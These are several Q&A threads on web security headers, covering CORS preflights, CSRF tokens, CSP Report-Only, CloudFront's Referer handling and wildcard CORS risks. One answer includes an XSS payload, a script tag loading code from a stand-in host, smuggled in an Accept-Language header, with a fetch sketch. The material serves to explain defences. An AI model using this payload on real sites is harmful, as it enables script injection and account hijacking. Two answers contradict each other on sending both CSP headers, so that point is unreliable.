For my web application, I'm configuring a set of OWASP security headers, like X-Frame-Options or X-Content-Type-Options. Now I'm wondering whether I should send all those headers for every request, or only for specific requests, e.g., use the "full" bunch of security headers for GET, POST, DELETE, and PUT, and send only CORS headers for preflight requests.
There is no harm in outputting the full set of security headers for every content type you serve (e.g. text/html, application/java) and for every request method (GET, PUT, etc.).
However, the headers that are applicable to particular requests and responses are discussed below.
Regarding returned content types:
X-Content-Type-Options especially needs to be on all content types, as otherwise types such as application/java could be interpreted differently by Internet Explorer with its content-sniffing.
X-Frame-Options for all content types to stop them being framed, although this does not prevent them being loaded by other means (e.g. <img> tag).
X-XSS-Protection added to HTML content types only should be enough.
Content-Security-Policy for HTML content types only should be enough.
Regarding HTTP methods (GET, POST, PUT etc):
Strict-Transport-Security is best output on every response, as this renews the sliding expiration and also sets the HSTS policy regardless of which way the resource was first requested.
Public Key Pinning Extension for HTTP (HPKP) should also be sent on every response, in much the same way as the Strict-Transport-Security header: once it has been output, the policy is set. As the sooner this happens the better, sending it for all requests gives more chance of it being set early.
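Putting that together, here is a minimal sketch of the "send everything on every response" approach, using Node's built-in http module; the header values are illustrative placeholders, not recommendations for any particular site:

```ts
import { createServer } from "node:http";

const server = createServer((_req, res) => {
  res.setHeader("X-Content-Type-Options", "nosniff"); // all content types
  res.setHeader("X-Frame-Options", "DENY"); // all content types
  // Every response renews the sliding HSTS expiration:
  res.setHeader("Strict-Transport-Security", "max-age=31536000; includeSubDomains");
  // Only meaningful for HTML responses, but harmless elsewhere:
  res.setHeader("X-XSS-Protection", "1; mode=block");
  res.setHeader("Content-Security-Policy", "default-src 'self'");
  res.setHeader("Content-Type", "text/html");
  res.end("<p>hello</p>");
});

server.listen(8080);
```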
I'm a bit confused about the security aspects of CORS POST requests. I know there is a lot of information about this topic online, but I couldn't find a definite answer to my questions.
If I understood it correctly, the goal of the same-origin policy is to prevent CSRF attacks and the goal of CORS is to enable resource sharing if (and only if) the server agrees to share its data with applications hosted on other sites (origins).
HTTP specifies that POST requests are not 'safe', i.e. they might change the state of the server, e.g. by adding a new comment. When initiating a CORS request with the HTTP method POST, the browser only performs a 'safe' preflight request if the content type of the request is non-standard (or if there are non-standard HTTP headers). So POST requests with a standard content type and standard headers are executed directly and might have negative side effects on the server (although the response might not be accessible to the requesting script).
There is this technique of adding a random token to every form, which the server then requires to be part of every non-'safe' request (see the sketch after this list). If a script tries to forge a request, it either
does not have the random token and the server declines the request, or
tries to access the form where the random token is defined. This response with the random token should have the appropriate header fields, such that the browser does not grant the evil script access to the response. In this case too, the attempt fails.
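A minimal sketch of that token technique (names and storage are hypothetical placeholders):

```ts
import { randomBytes } from "node:crypto";

// Token is generated per session, embedded in the form, and required
// on every non-'safe' request.
const sessionTokens = new Map<string, string>();

function issueToken(sessionId: string): string {
  const token = randomBytes(32).toString("hex");
  sessionTokens.set(sessionId, token);
  return token; // embed this in a hidden <input> in the form
}

function isValidToken(sessionId: string, submitted: string | undefined): boolean {
  // A forged request fails here: the attacker's script never got to read
  // the form, so it cannot know the token tied to the victim's session.
  return submitted !== undefined && sessionTokens.get(sessionId) === submitted;
}
```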
My conclusion is that the only protection against forged POST requests with a standard content type and standard headers is the technique described above (or a similar one). For any other non-'safe' request such as PUT or DELETE, or a POST with JSON content, it is not necessary to use the technique because CORS performs a 'safe' OPTIONS request first.
Why did the authors of CORS exempt these POSTs from preflight requests, thereby making it necessary to employ the technique described above?
See What is the motivation behind the introduction of preflight CORS requests?.
The reason CORS doesn’t require browsers to do a preflight for application/x-www-form-urlencoded, multipart/form-data, or text/plain content types is that if it did, that’d make CORS more restrictive than what browsers have already always allowed (and it’s not the intent of CORS to put new restrictions on what was already possible without CORS).
That is, with CORS, POST requests that you could do previously cross-origin are not preflighted—because browsers already allowed them before CORS existed, and servers knew about them. So CORS changes nothing about those “old” types of requests.
But prior to CORS, browsers wouldn’t allow you to do a cross-origin application/json POST at all, and so servers could assume they wouldn’t receive them. That’s why a CORS preflight is required for those types of “new” requests and not for the “old” ones—to give a heads-up to the server: this is a different “new” type of request that they must explicitly opt-in to supporting.
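To illustrate the distinction from the browser's point of view, here is a sketch using fetch (the URL is hypothetical):

```ts
// "Old" request: a plain <form> could always have sent this cross-origin,
// so the browser sends it straight away, with no preflight.
fetch("https://api.example.org/comments", {
  method: "POST",
  headers: { "Content-Type": "application/x-www-form-urlencoded" },
  body: "text=hello",
});

// "New" request: impossible cross-origin before CORS, so the browser first
// sends an OPTIONS preflight and only POSTs if the server opts in.
fetch("https://api.example.org/comments", {
  method: "POST",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({ text: "hello" }),
});
```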
After reading a lot about CORS and pre-flight requests I still don't quite get why there are some exceptions for doing a pre-flight. Why does it matter if the Content-Type is text/plain or application/json?
If I get it right, the value of CORS is to restrict the returned data (it doesn't care if the POST destroyed the database, it only cares that the browser can't read the output of that operation). But if that's true (and probably it's not), why are there preflight requests at all? Wouldn't it suffice to just check for a header like Access-Control-Allow-Cross-Origin-Request: true in the response?
The best answer I have found so far is in the question What is the motivation behind the introduction of preflight CORS requests?, but it's still a bit confusing to me.
Why does it matter if the Content-Type is 'text/plain' or 'application/json'?
The three content types (enctypes) supported by a form are as follows:
application/x-www-form-urlencoded
multipart/form-data
text/plain
If a form is received by a handler on the web server and it is not one of the above content types, then it can be assumed that it was an AJAX request that sent the form, and not an HTML <form /> tag.
Therefore, if an existing pre-CORS system uses the content type as a way of ensuring that a request is not cross-site, in order to prevent Cross-Site Request Forgery (CSRF), the authors of the CORS spec did not want to introduce any new security vulnerabilities into it. They did this by insisting that such requests trigger a preflight, to ensure both the browser and the server are CORS compatible first (a sketch of such a legacy check follows).
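To make that assumption concrete, here is a hypothetical sketch of such a legacy handler using Node's built-in http module; the token check and its header name are placeholders:

```ts
import { createServer, IncomingMessage } from "node:http";

// Only the three <form> enctypes can arrive cross-site pre-CORS, so a
// handler could demand a CSRF token for those and trust anything else
// as same-origin AJAX.
const FORM_ENCTYPES = new Set([
  "application/x-www-form-urlencoded",
  "multipart/form-data",
  "text/plain",
]);

function hasValidCsrfToken(req: IncomingMessage): boolean {
  return req.headers["x-csrf-token"] === "expected-token"; // placeholder check
}

createServer((req, res) => {
  const enctype = (req.headers["content-type"] ?? "").split(";")[0].trim();
  if (req.method === "POST" && FORM_ENCTYPES.has(enctype) && !hasValidCsrfToken(req)) {
    res.statusCode = 403; // could be a cross-site <form> post
    res.end("Possible CSRF");
    return;
  }
  // Any other enctype could, pre-CORS, only come from same-origin AJAX --
  // the assumption the preflight requirement was designed not to break.
  res.end("OK");
}).listen(8080);
```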
It doesn't care if the POST destroyed the database, it only cares that the browser can't read the output of that operation
Exactly right. By default, browsers obey the Same Origin Policy. CORS relaxes this restriction, allowing a page on another origin to read the responses to AJAX requests it makes.
why there are pre-flight requests at all?
As said, to ensure that both client and server are CORS compatible and that it is not just an HTML form being sent, which has always been possible cross-domain.
e.g. this has always worked. A form on example.com POSTing to example.org:
<form method="post" action="//example.org/handler.php"></form>
Wouldn't it suffice to just check for a header like 'Access-Control-Allow-Cross-Origin-Request: true' in the response?
Because of the CSRF vector. The preflight ensures that the cross-origin request is authorised (by examining the CORS response headers) before the browser will send it. This enables the browser to protect the current user's session. Remember that in a CSRF attack the attacker is not the one running the browser; the victim is. A manipulated browser that doesn't properly check CORS headers, or that spoofs a preflight, would therefore be of no advantage for an attacker to run themselves. Similarly, the preflight enables CSRF mitigations such as custom headers to work.
To summarise:
HTML form cross-origin
Can only be sent with certain enctypes
Cannot have custom headers
Browser will just send it without preflight because everything about a <form> submission will be standard (or "simple" as CORS puts it)
If a server handler receives a request from such a form, it will act upon it
AJAX cross-origin
Only possible via CORS
Early versions of some browsers, like IE 8 and 9, could send cross-origin requests, but not with non-standard headers or enctypes
Can have custom headers and enctypes in fully supporting browsers
In order to ensure that a cross-origin AJAX request is not spoofing a same-origin AJAX request (remember that cross-origin requests used not to be possible), if the AJAX request is not simple then the browser will send a preflight to ensure this is allowed
If a server handler receives such a request, it will act upon it, but only once it has passed the preflight checks: the initial request is made with the OPTIONS verb, and not until the browser agrees that the server is talking CORS will it send the actual GET or POST (see the sketch below)
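A minimal sketch of the server side of that exchange, using Node's built-in http module (the origin and header names are hypothetical):

```ts
import { createServer } from "node:http";

createServer((req, res) => {
  res.setHeader("Access-Control-Allow-Origin", "https://app.example.com");
  if (req.method === "OPTIONS") {
    // Preflight: advertise what the actual request is allowed to look like.
    res.setHeader("Access-Control-Allow-Methods", "GET, POST, PUT, DELETE");
    res.setHeader("Access-Control-Allow-Headers", "Content-Type, X-Custom");
    res.statusCode = 204;
    res.end();
    return;
  }
  // The actual GET/POST only arrives here if the preflight succeeded.
  res.end("handled");
}).listen(8080);
```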
I am working on adding the Content-Security-Policy-Report-Only header to my company's website. While researching it, I found that a few of the pages already have the Content-Security-Policy header set.
I investigated further and found that the directives there are not required. Also, the default directive used for those pages is 'self', whereas what I am planning to set for report-only is 'https:'.
I am not an expert in this area and want to make sure that the two header values don't interfere, hence I'm looking for guidance.
If I set report-only for the pages that already have the CSP header, is it going to interfere with the existing headers? Is the behavior browser dependent?
Any help/pointers would be helpful in deciding.
Thanks!
Content-Security-Policy and Content-Security-Policy-Report-Only have no effect on each other and are entirely independent. Setting both is a common practice when tightening policies. I wouldn't doubt that there has been a bug around this behavior at some point, but the spec is clear.
From Section 5 of the CSP2 spec:
A server MAY cause user agents to monitor one policy while enforcing another policy by returning both Content-Security-Policy and Content-Security-Policy-Report-Only header fields. For example, if a server operator wishes to enforce one policy but experiment with a stricter policy, she can monitor the stricter policy while enforcing the original policy. Once the server operator is satisfied that the stricter policy does not break the web application, the server operator can start enforcing the stricter policy.
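A minimal sketch of that pattern, reusing the policies from the question (the report endpoint is a hypothetical path):

```ts
import { createServer } from "node:http";

createServer((_req, res) => {
  // Enforced today:
  res.setHeader("Content-Security-Policy", "default-src 'self'");
  // Stricter candidate, monitored only; violations go to the report endpoint:
  res.setHeader(
    "Content-Security-Policy-Report-Only",
    "default-src https:; report-uri /csp-reports"
  );
  res.end("...");
}).listen(8080);
```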
Based on the link here, a server must not send both headers in the same response.
Here is the original text: A server MUST NOT provide Content-Security-Policy header field(s) and Content-Security-Policy-Report-Only header field(s) in the same HTTP response. If a client received both header fields in a response, it MUST discard all Content-Security-Policy-Report-Only header fields and MUST enforce the Content-Security-Policy header field.
I am using Amazon CloudFront to deliver some HDS files. I have an origin server which checks the HTTP Referer header and blocks the request if the referer is not allowed.
The problem is that CloudFront is removing the Referer header, so it is not forwarded to the origin.
Is it possible to tell Amazon not to do this?
Within days of writing the answer below, changes were announced to CloudFront: CloudFront will now pass through headers you select and can add some headers of its own.
However, much of what I stated below remains true. Note that in the announcement, an option is offered to forward all headers, which, as I suggested, would effectively disable caching. There's also an option to forward specific headers, which will cause CloudFront to cache the object against the complete set of forwarded headers -- not just the URI -- meaning that the effectiveness of the cache is somewhat reduced, since CloudFront has no option but to assume that the inclusion of the header might modify the response the server will generate for that request.
Each of your CloudFront distributions now contains a list of headers that are to be forwarded to the origin server. You have three options:
None - This option requests the original behavior.
All - This option forwards all headers and effectively disables all caching at the edge.
Whitelist - This option gives you full control of the headers that are to be forwarded. The list starts out empty and grows as you add more headers. You can add common HTTP headers by choosing them from a list. You can also add "custom" headers by simply entering the name.
If you choose the Whitelist option, each header that you add to the list becomes part of the cache key for the URLs associated with the distribution. Adding a header to the list simply tells CloudFront that the value of the header can affect the content returned by the origin server.
http://aws.amazon.com/blogs/aws/enhanced-cloudfront-customization/
CloudFront does remove the Referer header, along with several others that are not particularly meaningful -- or whose presence would cause illogical consequences -- in the world of cached content.
http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/RequestAndResponseBehaviorCustomOrigin.html
Just like cookies, if the Referer: header were allowed to remain, such that the origin could see it and react to it, that would imply that the object should be cached based on the request plus the referring page, which would largely defeat the cacheability of objects. Otherwise, if the origin reacted to an undesired referer by sending no-cache responses, all would be well until the first legitimate request came in, the response to which would then be served to subsequent requesters regardless of their referer, again largely defeating the purpose.
RFC-2616 Section 13 requires that a cache return a response that has been "checked for equivalence with what the origin server would have returned," and this implies that the response be valid based on all headers in the request.
The same thing goes for User-agent and other headers an origin server might use to modify its response... if you need to react to these values at the origin, there's little obvious purpose for serving them with a CDN.
Referring page-based tests are quite a primitive measure, the way many people use them, since headers are so trivial to forge.
If you are dealing with a platform that you don't control, and this is something you need to override (with a dummy value, just to keep the existing system "happy"), then a reverse proxy in front of the origin server could serve such a purpose, with CloudFront using the reverse proxy as its origin.
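A hypothetical sketch of such a proxy using Node's built-in http module; the upstream hostname and the dummy Referer value are assumptions:

```ts
import { createServer, request } from "node:http";

// Sits between CloudFront and the real origin, re-adding a dummy Referer
// so the legacy referer check stays happy.
createServer((clientReq, clientRes) => {
  const upstream = request(
    {
      host: "origin.internal.example", // the real origin server (assumed name)
      port: 80,
      path: clientReq.url,
      method: clientReq.method,
      headers: {
        ...clientReq.headers,
        host: "origin.internal.example", // point Host at the real origin
        referer: "https://www.example.com/", // dummy value the origin accepts
      },
    },
    (originRes) => {
      clientRes.writeHead(originRes.statusCode ?? 502, originRes.headers);
      originRes.pipe(clientRes);
    }
  );
  clientReq.pipe(upstream);
}).listen(8080);
```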
In today's newsletter, Amazon announced that it is now possible to forward request headers with CloudFront. See: http://aws.amazon.com/de/about-aws/whats-new/2014/06/26/amazon-cloudfront-device-detection-geo-targeting-host-header-cors/
I recently had to set Access-Control-Allow-Origin to * in order to be able to make cross-subdomain AJAX calls. I feel like this might be a security problem. What risks am I exposing myself to if I keep the setting?
By responding with Access-Control-Allow-Origin: *, the requested resource allows sharing with every origin. This basically means that any site can send an XHR request to your site and access the server's response, which would not be the case if you hadn't implemented this CORS response.
So any site can make a request to your site on behalf of their visitors and process its response. If you have something implemented like an authentication or authorization scheme that is based on something that is automatically provided by the browser (cookies, cookie-based sessions, etc.), the requests triggered by the third party sites will use them too.
This indeed poses a security risk, particularly if you allow resource sharing not just for selected resources but for every resource. In this context you should have a look at When is it safe to enable CORS?.
Update (2020-10-07)
The current Fetch Standard omits the credentials when the credentials mode is set to include, if Access-Control-Allow-Origin is set to *.
Therefore, if you are using a cookie-based authentication, your credentials will not be sent on the request.
Access-Control-Allow-Origin: * is totally safe to add to any resource, unless that resource contains private data protected by something other than standard credentials. Standard credentials are cookies, HTTP basic auth, and TLS client certificates.
Eg: Data protected by cookies is safe
Imagine https://example.com/users-private-data, which may expose private data depending on the user's logged in state. This state uses a session cookie. It's safe to add Access-Control-Allow-Origin: * to this resource, as this header only allows access to the response if the request is made without cookies, and cookies are required to get the private data. As a result, no private data is leaked.
Eg: Data protected by location / ip / internal network is not safe (unfortunately common with intranets and home appliances):
Imagine https://intranet.example.com/company-private-data, which exposes private company data, but this can only be accessed if you're on the company's wifi network. It's not safe to add Access-Control-Allow-Origin: * to this resource, as it's protected using something other than standard credentials. Otherwise, a bad script could use you as a tunnel to the intranet.
Rule of thumb
Imagine what a user would see if they accessed the resource in an incognito window. If you're happy with everyone seeing this content (including the source code the browser received), it's safe to add Access-Control-Allow-Origin: *.
AFAIK, Access-Control-Allow-Origin is just an HTTP header sent from the server to the browser. Limiting it to a specific address (or disabling it) does not make your site safer against, for example, robots. If robots want to, they can just ignore the header. The regular browsers out there (Explorer, Chrome, etc.) honor the header by default, but an application like Postman simply ignores it.
The server end doesn't actually check what the origin of the request is when it returns the response; it just adds the HTTP header. It's the browser (the client end) that sent the request which decides to read the access-control header and act upon it. Note that in the case of XHR it may use a special OPTIONS request to ask for the headers first.
So, anyone with creative scripting abilities can easily ignore the whole header, whatever is set in it.
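For example, here is a minimal sketch (hypothetical URL, run with Node in ESM mode) of a non-browser client reading a response regardless of its CORS headers, since nothing outside a browser enforces them:

```ts
// A non-browser client simply never looks at the CORS headers:
// the body prints no matter what Access-Control-Allow-Origin was sent.
const res = await fetch("https://api.example.com/data");
console.log(res.headers.get("access-control-allow-origin")); // just a string here
console.log(await res.text()); // readable either way: nothing enforces CORS
```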
See also Possible security issues of setting Access-Control-Allow-Origin.
Now to actually answer the question
I can't help but feel that I'm putting my environment to security risks.
If anyone wants to attack you, they can easily bypass Access-Control-Allow-Origin. But by enabling '*' you do give the attacker a few more 'attack vectors' to play with, like using regular web browsers that honor that HTTP header.
Here are two examples, posted as comments, of when a wildcard is really problematic:
Suppose I log into my bank's website. If I go to another page and then go back to my bank, I'm still logged in because of a cookie. Other users on the internet can hit the same URLs at my bank as I do, yet they won't be able to access my account without the cookie. If cross-origin requests are allowed, a malicious website can effectively impersonate the user.
– Brad
Suppose you have a common home router, such as a Linksys WRT54g or something. Suppose that router allows cross-origin requests. A script on my web page could make HTTP requests to common router IP addresses (like 192.168.1.1) and reconfigure your router to allow attacks. It can even use your router directly as a DDoS node. (Most routers have test pages which allow for pings or simple HTTP server checks. These can be abused en masse.)
– Brad
I feel that these comments should have been answers, because they explain the problem with a real life example.
This answer was originally written as a reply to What are the security implications of setting Access-Control-Allow-Headers: *, if any? and was merged despite being irrelevant to this question.
Setting it to a wildcard * means allowing all headers apart from the safelisted ones (which are allowed anyway), and removing the restrictions that keep those safelisted headers safe.
These are the restrictions for the 4 safelisted headers to be considered safe:
For Accept-Language and Content-Language: can only have values consisting of 0-9, A-Z, a-z, space or *,-.;=.
For Accept and Content-Type: can't contain a CORS-unsafe request-header byte: 0x00-0x1F (except for 0x09 (HT), which is allowed), "():<>?@[\]{}, and 0x7F (DEL).
For Content-Type: needs to have a MIME type of its parsed value (ignoring parameters) of either application/x-www-form-urlencoded, multipart/form-data, or text/plain.
For any header: the value’s length can't be greater than 128.
For simplicity's sake, I'll base my answer on these headers.
Depending on server implementation, simply removing these limitations can be very dangerous (to the user).
For example, this outdated WordPress plugin has a reflected XSS vulnerability where the value of Accept-Language was parsed and rendered on the page as-is, causing script execution in the user's browser should a malicious payload be included in the value.
With the wildcard header Access-Control-Allow-Headers: *, a third-party site could have the victim's browser send a request to your site with the header value Accept-Language: <script src="https://example.com/malicious-script.js"></script>, given that the wildcard removes the first restriction above.
The preflight response would then give the green light to this request, triggering an XSS in the user's browser, whose impact can range from an annoying popup to losing control of their account through cookie hijacking. A sketch of such a request follows.
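As a sketch (URLs hypothetical), the request the attacker's page would issue looks like this; the non-safelisted header value forces a preflight, which a wildcard policy approves, and the payload only fires where the vulnerable page reflects the header somewhere it gets rendered:

```ts
// Attacker-controlled page; only succeeds against a server whose preflight
// response is Access-Control-Allow-Headers: * and which reflects the header.
fetch("https://victim.example/search", {
  headers: {
    "Accept-Language":
      '<script src="https://example.com/malicious-script.js"></script>',
  },
});
```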
Thus, I would strongly recommend against setting a wildcard unless it is for an API endpoint where nothing is being rendered on the page.
You can set Access-Control-Allow-Headers: Pragma as an alternative solution to your problem.
Note that the value * only counts as a special wildcard value for requests without credentials (requests without HTTP cookies or HTTP authentication information), otherwise it will be read as a literal header. Documentation
In the scenario where a server attempts to disable cross-origin restrictions completely by setting the headers below:
Access-Control-Allow-Origin: * (tells the browser that the server accepts cross-site requests from any origin)
Access-Control-Allow-Credentials: true (tells the browser that cross-site requests can send cookies)
There is a fail-safe implemented in browsers that will result in the error below:
"Credential is not supported if the CORS header ‘Access-Control-Allow-Origin’ is ‘*’"
So in most scenarios, setting Access-Control-Allow-Origin to * will not be a problem. However, to secure against attacks, the server can maintain a list of allowed origins; whenever the server gets a cross-origin request, it can validate the Origin header against that list and then echo the same value back in the Access-Control-Allow-Origin header, as sketched below.
Since the Origin header can't be changed by JavaScript running in the browser, a malicious site will not be able to spoof it.
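A minimal sketch of that allowlist-and-echo approach, using Node's built-in http module (the allowed origins are hypothetical):

```ts
import { createServer } from "node:http";

const ALLOWED_ORIGINS = new Set([
  "https://app.example.com",
  "https://admin.example.com",
]);

createServer((req, res) => {
  const origin = req.headers.origin;
  if (origin && ALLOWED_ORIGINS.has(origin)) {
    // Echo the specific origin rather than *, so credentialed requests work.
    res.setHeader("Access-Control-Allow-Origin", origin);
    res.setHeader("Access-Control-Allow-Credentials", "true");
    res.setHeader("Vary", "Origin"); // keep shared caches from mixing origins
  }
  res.end("...");
}).listen(8080);
```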